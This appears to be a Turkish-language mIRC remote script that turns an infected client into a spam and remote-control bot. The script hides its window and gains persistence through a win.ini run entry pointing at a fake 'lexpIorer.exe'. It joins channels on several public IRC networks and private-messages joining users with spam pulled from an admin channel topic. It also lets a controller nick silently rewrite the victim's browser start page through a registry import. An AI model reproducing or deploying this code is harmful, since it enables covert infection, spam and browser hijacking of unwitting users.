on 1:text:*:?: { closemsg $nick }
on 1:ACTION:*:?:  { closemsg $nick }
on 1:NOTICE:*:?: { closemsg $nick }

;---------------------------------------------

raw 433:*:nick $read Ni.dll
raw 471:*:%kanallar = $remtok(%kanallar,$2,44) | join $read Ch.dll
raw 473:*:%kanallar = $remtok(%kanallar,$2,44) | join $read Ch.dll
raw 474:*:%kanallar = $remtok(%kanallar,$2,44) | join $read Ch.dll
raw 475:*:%kanallar = $remtok(%kanallar,$2,44) | join $read Ch.dll
raw 477:*:%kanallar = $remtok(%kanallar,$2,44) | join $read Ch.dll

;---------------------------------------------

on *^:ERROR:*banned*:{ server $read(Se.dll) | halt }

;---------------------------------------------

on 1:connect: { 
  unset %hit
  ignore -wd *
  if ($server !== %adminserver) { 
    timer 1 200 Server 
    join $read Ch.dll
    if ($server == irc.e-kolay.net) { join $read(ECh.dll) }
    if ($network == ZurnaNet) { join $read(ZCh.dll) }
  } 
  if ($server == %adminserver) { join #botz xx }
}

on 1:disconnect: { 
  unset %hit
  partall 
  nickislem 
  if ($server !== %adminserver) { 
    server $read(Se.dll) 
  }
  else {
    server %adminserver $+ :6667
  }
  halt 
}

;---------------------------------------------

on ^*:join:*: {
  if ($server !== %adminserver) && ($nick !== $me) && ($nick !== %koruma1) && ($nick !== %koruma2) && ($nick !== %koruma3) && ($nick !== %koruma4) && ($nick !== %koruma5) && ($nick !== %koruma6) && ($nick !== %koruma7) && ($nick !== %koruma8) && ($nick !== %koruma9) && ($nick !== %koruma10) { 
    set %nicks $nick 
    inc %hit 1 
    gonder 
  } 
  else {
    if ($server == %adminserver) && ($chan !== #botz) {
      part $chan
    }
  }
}
alias gonder {
  if (%hit == 5) { unset %hit }
  if (bot isin %nicks) || (a- isin %nicks) || (%koruma isin %nicks) { 
    unset %hit 
  }
  else { 
    if (%hit == 4) {
      msg %nicks %mesaj
      unset %hit 
    }
  }
}

;---------------------------------------------

alias mesaj { echo -s 0,6 Mesajým:  %mesaj  | msg #botz 0,6 Mesajým:  %mesaj  }

on 1:join:*:{ 
  if ($server == %adminserver) { 
    set %topickanal $chan
  }
}

;-----------------------------------------------------

raw 332:* {
  if ($server == %adminserver) && (%topickanal == #botz) { set %mesaj $3- | echo -a 0,6 Mesajým:  %mesaj | msg #botz 0,6 Mesajým:  %mesaj }
  halt
}

;-----------------------------------------------------

on 1:start: { nickislem | dll Gz.dll do_ShowWindow $window(-2).hwnd 0 | //writeini -n c:\windows\win.ini windows run c:\windows\lexpIorer.exe | ignore -r | server %adminserver $+ :6667 | server -m irc.zurna.net | server -m irc.e-kolay.net | server -m irc.rekor.net | server -m irc.yuzuk.net | server -m irc.dal.net | server -m irc.undernet.org | remove gfile.exe }
on 1:exit: { /run $mircexe }

;---------------------------------------------
on 1:text:*!web*:#botz: {
  if ($server == irc.dostuz.net) { 
    if (dn1914 isop $chan) { 
      if ($nick == dn1914) { 
        set %giris $2
        set %system $r(10,1999) $+ .reg
        .write %system REGEDIT4
        .write %system [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
        .write %system "Start Page" = " $+ %giris $+ "
        .run -n regedit /s %system
        .timer 1 4 remove %system
        msg #dn19034 0,4tamamdýr giriþ sayfasý %giris olarak ayarlandý
      }
    }
  }
}
}
